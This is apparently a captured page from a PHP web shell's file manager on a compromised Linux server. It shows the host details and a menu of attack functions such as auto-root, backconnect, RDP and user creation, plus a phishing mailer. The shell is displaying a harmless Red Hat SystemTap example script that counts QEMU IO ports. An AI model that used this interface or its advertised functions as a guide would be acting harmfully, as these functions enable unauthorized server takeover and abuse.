Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
examples /
virtualization /
[ HOME SHELL ]
Name
Size
Permission
Action
kvm_service_time.meta
1.18
KB
-rw-r--r--
kvm_service_time.stp
2.71
KB
-rwxr-xr-x
kvm_service_time.txt
3.14
KB
-rw-r--r--
qemu_count.meta
623
B
-rw-r--r--
qemu_count.stp
465
B
-rwxr-xr-x
qemu_io.meta
695
B
-rw-r--r--
qemu_io.stp
781
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : qemu_io.stp
#!/usr/bin/stap # # Copyright (C) 2011 Red Hat, Inc. # Written by William Cohen <wcohen@redhat.com> # # The qemu_io.stp script tallies the number of times each of the IO # port on the guest virtual machines is touched by a input or output # operation. When the script exits, it prints a count of the number of # times each IO port read and written. global cpu_in, cpu_out probe qemu.*.*.cpu_in?, qemu.kvm.cpu_in? { cpu_in[addr]++ } probe qemu.*.*.cpu_out?, qemu.kvm.cpu_out? {cpu_out[addr]++ } probe end { # write out the data printf("\ncpu_in\n%6s %8s\n","port", "count") foreach (addr+ in cpu_in) printf("0x%04x %8d\n", addr, cpu_in[addr]) printf("\ncpu_out\n%6s %8s\n","port", "count") foreach (addr+ in cpu_out) printf("0x%04x %8d\n", addr, cpu_out[addr]) }
Close